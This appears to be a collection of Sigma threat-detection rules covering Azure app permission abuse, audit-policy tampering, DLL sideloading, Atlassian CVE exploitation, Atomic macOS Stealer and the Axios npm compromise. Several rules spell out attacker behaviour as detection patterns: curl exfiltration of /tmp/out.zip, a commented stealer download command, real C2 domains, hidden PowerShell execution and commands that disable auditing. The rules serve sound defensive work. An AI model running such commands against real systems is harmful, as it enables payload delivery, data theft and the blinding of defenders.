title: App Granted Microsoft Permissions
id: c1d147ae-a951-48e5-8b41-dcd0170c7213
status: test
description: Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD
references:
    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions
author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
date: 2022-07-10
tags:
    - attack.credential-access
    - attack.t1528
logsource:
    product: azure
    service: auditlogs
detection:
    selection:
        properties.message:
            - Add delegated permission grant
            - Add app role assignment to service principal
    condition: selection
falsepositives:
    - When the permission is legitimately needed for the app
level: high

title: App Granted Privileged Delegated Or App Permissions
id: 5aecf3d5-f8a0-48e7-99be-3a759df7358f
related:
    - id: ba2a7c80-027b-460f-92e2-57d113897dbc
      type: obsolete
status: test
description: Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions
references:
    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions
author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
date: 2022-07-28
modified: 2023-03-29
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1098.003
logsource:
    product: azure
    service: auditlogs
detection:
    selection:
        properties.message: Add app role assignment to service principal
    condition: selection
falsepositives:
    - When the permission is legitimately needed for the app
level: high

title: AppX Located in Known Staging Directory Added to Deployment Pipeline
id: 5cdeaf3d-1489-477c-95ab-c318559fc051
status: test
description: |
    Detects an appx package that was added to the pipeline of the "to be processed" packages that is located in a known folder often used as a staging directory.
references:
    - https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
    - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting
    - https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-11
tags:
    - attack.stealth
logsource:
    product: windows
    service: appxdeployment-server
detection:
    selection_eid:
        EventID: 854
    selection_paths_forward:
        Path|contains: # Paths can be written using forward slash if the "file://" protocol is used
            - ':/Perflogs/'
            - ':/Users/Public/'
            - ':/Windows/Temp/'
            - '/AppdData/Local/Temp/'
            - '/Desktop/'
            - '/Downloads/'
    selection_paths_back:
        Path|contains: # Paths can be written using forward slash if the "file://" protocol is used
            - ':\PerfLogs\'
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - '\AppdData\Local\Temp\'
            - '\Desktop\'
            - '\Downloads\'
    condition: selection_eid and 1 of selection_paths_*
falsepositives:
    - Unknown
level: high

title: Application AppID Uri Configuration Changes
id: 1b45b0d1-773f-4f23-aedc-814b759563b1
status: test
description: Detects when a configuration change is made to an applications AppID URI.
references:
    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#appid-uri-added-modified-or-removed
author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
date: 2022-06-02
tags:
    - attack.initial-access
    - attack.persistence
    - attack.credential-access
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1552
    - attack.t1078.004
logsource:
    product: azure
    service: auditlogs
detection:
    selection:
        properties.message:
            - Update Application
            - Update Service principal
    condition: selection
falsepositives:
    - When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event.
level: high

title: Application URI Configuration Changes
id: 0055ad1f-be85-4798-83cf-a6da17c993b3
status: test
description: |
    Detects when a configuration change is made to an applications URI.
    URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.
references:
    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-configuration-changes
author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'
date: 2022-06-02
tags:
    - attack.initial-access
    - attack.stealth
    - attack.t1528
    - attack.t1078.004
    - attack.persistence
    - attack.credential-access
    - attack.privilege-escalation
logsource:
    product: azure
    service: auditlogs
detection:
    selection:
        properties.message: Update Application Sucess- Property Name AppAddress
    condition: selection
falsepositives:
    - When and administrator is making legitimate URI configuration changes to an application. This should be a planned event.
level: high

title: Arbitrary File Download Via IMEWDBLD.EXE
id: 863218bd-c7d0-4c52-80cd-0a96c09f54af
related:
    - id: 8d7e392e-9b28-49e1-831d-5949c6281228
      type: derived
status: test
description: Detects usage of "IMEWDBLD.exe" to download arbitrary files
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download
    - https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/
author: Swachchhanda Shrawan Poudel
date: 2023-11-09
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\IMEWDBLD.exe'
        - OriginalFileName: 'imewdbld.exe'
    selection_cli:
        CommandLine|contains:
            - 'http://'
            - 'https://'
    condition: all of selection_*
falsepositives:
    - Unknown
# Note: Please reduce this to medium if you find legitimate use case of this utility with a URL
level: high

title: Aruba Network Service Potential DLL Sideloading
id: 90ae0469-0cee-4509-b67f-e5efcef040f7
status: test
description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking
references:
    - https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-22
modified: 2023-03-15
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image|endswith: '\arubanetsvc.exe'
        ImageLoaded|endswith:
            - '\wtsapi32.dll'
            - '\msvcr100.dll'
            - '\msvcp100.dll'
            - '\dbghelp.dll'
            - '\dbgcore.dll'
            - '\wininet.dll'
            - '\iphlpapi.dll'
            - '\version.dll'
            - '\cryptsp.dll'
            - '\cryptbase.dll'
            - '\wldp.dll'
            - '\profapi.dll'
            - '\sspicli.dll'
            - '\winsta.dll'
            - '\dpapi.dll'
    filter:
        ImageLoaded|startswith:
            - 'C:\Windows\System32\'
            - 'C:\Windows\SysWOW64\'
            - 'C:\Windows\WinSxS\'
    condition: selection and not filter
falsepositives:
    - Unknown
level: high

title: Atera Agent Installation
id: 87261fb2-69d0-42fe-b9de-88c6b5f65a43
status: test
description: Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators
references:
    - https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent
author: Bhabesh Raj
date: 2021-09-01
modified: 2022-12-25
tags:
    - attack.command-and-control
    - attack.t1219.002
logsource:
    service: application
    product: windows
detection:
    selection:
        EventID: 1033
        Provider_Name: MsiInstaller
        Message|contains: AteraAgent
    condition: selection
falsepositives:
    - Legitimate Atera agent installation
level: high

title: Atlassian Bitbucket Command Injection Via Archive API
id: 65c0a0ab-d675-4441-bd6b-d3db226a2685
status: test
description: Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804
references:
    - https://twitter.com/_0xf4n9x_/status/1572052954538192901
    - https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/
    - https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
    - https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-29
modified: 2023-01-02
tags:
    - attack.initial-access
    - attack.t1190
    - cve.2022-36804
    - detection.emerging-threats
logsource:
    category: webserver
detection:
    selection:
        cs-uri-query|contains|all:
            - '/rest/api/latest/projects/'
            - 'prefix='
            - '%00--exec'
    condition: selection
falsepositives:
    - Web vulnerability scanners
level: high

title: Atlassian Confluence CVE-2022-26134
id: 7fb14105-530e-4e2e-8cfb-99f7d8700b66
related:
    - id: 245f92e3-c4da-45f1-9070-bc552e06db11
      type: derived
status: test
description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
references:
    - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-03
tags:
    - attack.initial-access
    - attack.execution
    - attack.t1190
    - attack.t1059
    - cve.2022-26134
    - detection.emerging-threats
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        # Monitor suspicious child processes spawned by Confluence
        ParentImage|startswith: '/opt/atlassian/confluence/'
        ParentImage|endswith: '/java'
        CommandLine|contains:
            - '/bin/sh'
            - 'bash'
            - 'dash'
            - 'ksh'
            - 'zsh'
            - 'csh'
            - 'fish'
            - 'curl'
            - 'wget'
            - 'python'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Atomic MacOS Stealer - FileGrabber Activity
id: e710a880-1f18-4417-b6a0-b5afdf7e33da
related:
    - id: e710a880-1f18-4417-b6a0-b5afdf7e305a
      type: obsolete
status: experimental
description: |
    Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
references:
    - https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html
    - https://hunt.io/blog/macos-clickfix-applescript-terminal-phishing
    - https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L36
    - https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
date: 2025-11-22
tags:
    - attack.execution
    - attack.t1059.002
    - detection.emerging-threats
logsource:
    category: process_creation
    product: macos
detection:
    selection_curl_post:
        CommandLine|contains|all:
            - 'curl'
            - 'POST'
            - 'user:'
            - '-H '
            - 'BuildID'
            - 'file=@/tmp/out.zip'
            - 'cl: 0'
    selection_filegrabber_exec:
        CommandLine|contains|all:
            - 'FileGrabber'
            - '/tmp'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: high

title: Atomic MacOS Stealer - Persistence Indicators
id: e710a880-1f18-4417-b6a0-b5afdf7e3023
status: experimental
description: |
    Detects creation of persistence artifacts placed by Atomic MacOS Stealer in macOS systems. Recent Atomic MacOS Stealer variants have been observed dropping these to maintain persistent access after compromise.
references:
    - https://moonlock.com/amos-backdoor-persistent-access
    - https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L44
author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
date: 2025-11-22
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1564.001
    - attack.t1543.004
    - detection.emerging-threats
logsource:
    category: file_event
    product: macos
detection:
    selection_user_helper:
        # sh -c curl -o '/Users/<username>/.helper' hxxps://halesmp[.]com/zxc/app
        Image|endswith: '/curl'
        TargetFilename|startswith: '/Users/'
        TargetFilename|endswith: '.helper'
    selection_launchdaemon:
        TargetFilename: '/Library/LaunchDaemons/com.finder.helper.plist'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: high

title: Attempts of Kerberos Coercion Via DNS SPN Spoofing
id: 0ed99dda-6a35-11ef-8c99-0242ac120002
related:
    - id: b07e58cf-cacc-4135-8473-ccb2eba63dd2
      type: similar
status: experimental
description: |
    Detects the presence of "UWhRC....AAYBAAAA" pattern in command line.
    The pattern "1UWhRCAAAAA..BAAAA" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.
    Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.
    It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records
    to spoof Service Principal Names (SPNs) and redirect authentication requests like in CVE-2025-33073.
    If you see this pattern in the command line, it is likely an attempt to add spoofed Service Principal Names (SPNs) to DNS records,
    or checking for the presence of such records through the `nslookup` command.
references:
    - https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
    - https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-06-20
tags:
    - attack.collection
    - attack.credential-access
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1557.001
    - attack.t1187
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'UWhRCA'
            - 'BAAAA'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Atypical Travel
id: 1a41023f-1e70-4026-921a-4d9341a9038e
status: test
description: Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.
references:
    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#atypical-travel
    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
    - attack.stealth
    - attack.t1078
    - attack.persistence
    - attack.privilege-escalation
    - attack.initial-access
logsource:
    product: azure
    service: riskdetection
detection:
    selection:
        riskEventType: 'unlikelyTravel'
    condition: selection
falsepositives:
    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high

title: Audit Policy Tampering Via Auditpol
id: 0a13e132-651d-11eb-ae93-0242ac130002
related:
    - id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e # Old auditpol
      type: similar
status: test
description: |
  Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.
  This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
references:
    - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/
author: Janantha Marasinghe (https://github.com/blueteam0ps)
date: 2021-02-02
modified: 2023-02-22
tags:
    - attack.defense-impairment
    - attack.t1685.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\auditpol.exe'
        - OriginalFileName: 'AUDITPOL.EXE'
    selection_cli:
        CommandLine|contains:
            - 'disable' # disables a specific audit policy
            - 'clear'   # delete or clears audit policy
            - 'remove'  # removes an audit policy
            - 'restore' # restores an audit policy
    condition: all of selection_*
falsepositives:
    - Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored
level: high

title: Audit Policy Tampering Via NT Resource Kit Auditpol
id: c6c56ada-612b-42d1-9a29-adad3c5c2c1e
related:
    - id: 0a13e132-651d-11eb-ae93-0242ac130002 # New auditpol version
      type: similar
status: test
description: |
    Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
    This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
references:
    - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol
author: Nasreddine Bencherchali (Nextron Systems)
date: 2021-12-18
modified: 2023-02-21
tags:
    - attack.defense-impairment
    - attack.t1685.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains:
            - '/logon:none'
            - '/system:none'
            - '/sam:none'
            - '/privilege:none'
            - '/object:none'
            - '/process:none'
            - '/policy:none'
    condition: selection
falsepositives:
    - The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure
level: high

title: Audit Rules Deleted Via Auditctl
id: bed26dea-4525-47f4-b24a-76e30e44ffb0
status: experimental
description: |
    Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.
    This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.
    Removal of audit rules can significantly impair detection of malicious activities on the affected system.
references:
    - https://www.atomicredteam.io/atomic-red-team/atomics/T1562.012
    - https://linux.die.net/man/8/auditct
author: Mohamed LAKRI
date: 2025-10-17
tags:
    - attack.defense-impairment
    - attack.t1685.004
logsource:
    product: linux
    category: process_creation
detection:
    selection:
        Image|endswith: '/auditctl'
        CommandLine|re: '-D'
    condition: selection
falsepositives:
    - An administrator troubleshooting. Investigate all attempts.
level: high

title: Auditing Configuration Changes on Linux Host
id: 977ef627-4539-4875-adf4-ed8f780c4922
status: test
description: Detect changes in auditd configuration files
references:
    - https://github.com/Neo23x0/auditd/blob/master/audit.rules
    - Self Experience
author: Mikhail Larin, oscd.community
date: 2019-10-25
modified: 2021-11-27
tags:
    - attack.defense-impairment
    - attack.t1685
logsource:
    product: linux
    service: auditd
detection:
    selection:
        type: PATH
        name:
            - /etc/audit/*
            - /etc/libaudit.conf
            - /etc/audisp/*
    condition: selection
falsepositives:
    - Legitimate administrative activity
level: high

title: Axios NPM Compromise File Creation Indicators - Linux
id: b7cb840c-11f6-47f7-b3ef-5524739c9077
status: experimental
description: |
    Detects file creation events linked to the Axios NPM supply chain compromise. Axios is a popular JavaScript HTTP client.
    On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency ([email protected]) that executed a postinstall script as a cross-platform RAT dropper.
references:
    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
    - https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
    - attack.initial-access
    - attack.t1195.002
    - attack.command-and-control
    - attack.t1105
    - detection.emerging-threats
logsource:
    category: file_event
    product: linux
detection:
    selection:
        Image|endswith: '/curl'
        TargetFilename: '/tmp/ld.py'
    condition: selection
falsepositives:
    - Highly unlikely
level: high

title: Axios NPM Compromise File Creation Indicators - MacOS
id: 2db0458c-05c9-4069-a26f-77becd9c8c13
status: experimental
description: |
    Detects file creation events linked to the Axios NPM supply chain compromise on macOS devices. Axios is a popular JavaScript HTTP client.
    On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency ([email protected]) that executed a postinstall script as a cross-platform RAT dropper.
references:
    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
    - https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
    - attack.initial-access
    - attack.t1195.002
    - attack.command-and-control
    - attack.t1105
    - detection.emerging-threats
logsource:
    category: file_event
    product: macos
detection:
    selection_curl_download:
        Image|endswith: '/curl'
        TargetFilename: '/Library/Caches/com.apple.act.mond'
    selection_node_shell:
        Image|endswith: '/node'
        TargetFilename: '/tmp/6202033'
    condition: 1 of selection_*
falsepositives:
    - Highly unlikely
level: high

title: Axios NPM Compromise File Creation Indicators - Windows
id: cd6386fa-bb9a-4b67-b006-786b6ab5d2ba
status: experimental
description: |
    Detects file creation events linked to the Axios NPM supply chain compromise. Axios is a popular JavaScript HTTP client.
    On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency ([email protected]) that executed a postinstall script as a cross-platform RAT dropper.
    The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.
    The attack used cscript.exe (VBScript), curl.exe (C2), and PowerShell masquerading as Windows Terminal.
references:
    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
    - https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
    - attack.initial-access
    - attack.t1195.002
    - detection.emerging-threats
logsource:
    category: file_event
    product: windows
detection:
    selection_img:
        Image|endswith:
            - '\node.exe'
            - '\powershell.exe'
    selection_fils:
        - TargetFilename:
              - 'C:\ProgramData\wt.exe'
              - 'C:\ProgramData\system.bat'
        - TargetFilename|contains|all:
              - 'C:\Users\'
              - '\AppData\Local\Temp\6202033.vbs'
        - TargetFilename|contains|all:
              - 'C:\Users\'
              - '\AppData\Local\Temp\6202033.ps1'
    condition: all of selection_*
falsepositives:
    - Highly unlikely
level: high

title: Axios NPM Compromise Indicators - Linux
id: 0a23a62d-c5b3-468b-a072-25064a9a8c87
status: experimental
description: |
    Detects the Linux-specific execution chain of the plain-crypto-js malicious npm dependency by Axios NPM package, including payload download via curl and detached execution using nohup and python3.
    On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency ([email protected]) that executed a postinstall script as a cross-platform RAT dropper.
    The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.
references:
    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
    - https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
    - attack.initial-access
    - attack.t1195.002
    - attack.execution
    - attack.command-and-control
    - attack.t1059.006
    - attack.t1059.004
    - attack.t1105
    - detection.emerging-threats
logsource:
    category: process_creation
    product: linux
detection:
    selection_node_shell:
        ParentImage|endswith:
            - '/node'
            - '/bun'
        CommandLine|contains|all:
            - 'curl '
            - '/tmp/ld.py'
            - 'python3 '
            - 'nohup '
            - '6202033'
    selection_curl_download:
        Image|endswith: '/curl'
        CommandLine|contains: 'http://sfrclak.com'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: high

title: Axios NPM Compromise Indicators - Windows
id: f6c27ecc-d890-4452-80e6-2e274a10e097
status: experimental
description: |
    Detects the specific Windows execution chain and process tree associated with the Axios NPM supply chain compromise.
    On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency ([email protected]) that executed a postinstall script as a cross-platform RAT dropper.
    The dropper contacted a C2 server, delivered platform-specific payloads, deleted itself, and replaced package.json to evade detection.
    The attack used cscript.exe (VBScript), curl.exe (C2), and PowerShell masquerading as Windows Terminal.
references:
    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
    - https://thehackernews.com/2026/03/axios-supply-chain-attack-pushes-cross.html?m=1
    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
    - attack.initial-access
    - attack.t1195.002
    - attack.execution
    - attack.command-and-control
    - attack.t1059.003
    - attack.t1059.005
    - attack.t1105
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_cscript:
        ParentImage|endswith:
            - '\node.exe'
            - '\bun.exe'
        Image|endswith: '\cmd.exe'
        CommandLine|contains|all:
            - 'cscript'
            - 'AppData\Local\Temp'
            - '//nologo && del'
            - '6202033.vbs'
    selection_curl:
        Image|endswith:
            - '\curl.exe'
            - '\powershell.exe'
        CommandLine|contains: 'http://sfrclak.com'
    selection_susp_cli:
        OriginalFileName: 'PowerShell.EXE'
        CommandLine|contains: '"C:\ProgramData\wt.exe" -w hidden -ep bypass -file'
    condition: 1 of selection_*
falsepositives:
    - Highly unlikely
level: high

title: Axios NPM Compromise Indicators - macOS
id: a09ee860-31b3-4586-8a68-0ebd74ce0e5f
status: experimental
description: |
    Detects the macOS-specific execution chain of the plain-crypto-js malicious npm dependency in Axios NPM Package, including AppleScript execution via osascript, payload download, permission modification, execution, and cleanup.
author: Swachchhanda Shrawan Poudel (Nextron Systems)
references:
    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
    - https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
date: 2026-04-01
tags:
    - attack.initial-access
    - attack.t1195.002
    - attack.execution
    - attack.command-and-control
    - attack.t1059.002
    - attack.t1059.004
    - attack.t1105
    - detection.emerging-threats
logsource:
    category: process_creation
    product: macos
detection:
    selection_osascript:
        CommandLine|contains|all:
            - 'nohup '
            - 'osascript '
            - '/tmp/6202033'
    selection_curl_download:
        CommandLine|contains|all:
            - 'curl '
            - 'packages.npm.org/product'
            - '/Library/Caches/com.apple.act.mond'
    selection_cleanup:
        CommandLine|contains|all:
            - 'rm '
            - '-rf '
            - '/tmp/6202033'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: high

title: Axios NPM Compromise Malicious C2 Domain DNS Query
id: 73e5d24f-493f-4092-bd2f-c72cabda40ee
status: experimental
description: |
    Detects DNS queries for the malicious C2 domain associated with the plain-crypto-js/Axios npm package supply chain compromise.
    On March 30, 2026, malicious versions (1.14.1, 0.30.4) were published to npm, injecting a dependency ([email protected]) that executed a postinstall script as a cross-platform RAT dropper.
    This detection detects endpoints attempting to resolve the attacker's C2 domain (sfrclak.com) used for command and control communication.
references:
    - https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan
    - https://www.derp.ca/research/axios-npm-supply-chain-rat/
    - https://www.trendmicro.com/zh_hk/research/26/c/axios-npm-package-compromised.html
    - https://www.elastic.co/security-labs/axios-supply-chain-compromise-detections
    - https://www.virustotal.com/gui/file/e10b1fa84f1d6481625f741b69892780140d4e0e7769e7491e5f4d894c2e0e09
    - https://www.huntress.com/blog/supply-chain-compromise-axios-npm-package
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2026-04-01
tags:
    - attack.command-and-control
    - attack.t1071.001
    - attack.t1568
    - detection.emerging-threats
logsource:
    category: dns
detection:
    selection:
        query:
            - 'sfrclak.com'
            - 'calltan.com'
            - 'callnrwise.com'
    condition: selection
falsepositives:
    - Unlikely
level: high

title: Azure AD Account Credential Leaked
id: 19128e5e-4743-48dc-bd97-52e5775af817
status: test
description: Indicates that the user's valid credentials have been leaked.
references:
    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#leaked-credentials
    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-03
tags:
    - attack.t1589
    - attack.reconnaissance
logsource:
    product: azure
    service: riskdetection
detection:
    selection:
        riskEventType: 'leakedCredentials'
    condition: selection
falsepositives:
    - A rare hash collision.
level: high

title: Azure AD Threat Intelligence
id: a2cb56ff-4f46-437a-a0fa-ffa4d1303cba
status: test
description: Indicates user activity that is unusual for the user or consistent with known attack patterns.
references:
    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-sign-in
    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#azure-ad-threat-intelligence-user
    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins
author: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'
date: 2023-09-07
tags:
    - attack.stealth
    - attack.t1078
    - attack.persistence
    - attack.privilege-escalation
    - attack.initial-access
logsource:
    product: azure
    service: riskdetection
detection:
    selection:
        riskEventType: 'investigationsThreatIntelligence'
    condition: selection
falsepositives:
    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.
level: high

title: Azure Login Bypassing Conditional Access Policies
id: 13f2d3f5-6497-44a7-bf5f-dc13ffafe5dc
status: experimental
description: |
    Detects a successful login to the Microsoft Intune Company Portal which could allow bypassing Conditional Access Policies and InTune device trust using a tool like TokenSmith.
author: Josh Nickels, Marius Rothenbücher
references:
    - https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/
    - https://github.com/JumpsecLabs/TokenSmith
date: 2025-01-08
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.initial-access
    - attack.stealth
    - attack.t1078
logsource:
    service: audit
    product: m365
detection:
    selection:
        Operation: 'UserLoggedIn'
        ApplicationId: '9ba1a5c7-f17a-4de9-a1f1-6178c8d51223'
        ResultStatus: 'Success'
        RequestType: 'Cmsi:Cmsi'
    filter_main_bjectid:
        ObjectId: '0000000a-0000-0000-c000-000000000000' # Microsoft Intune seen when mobile devices are enrolled
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high

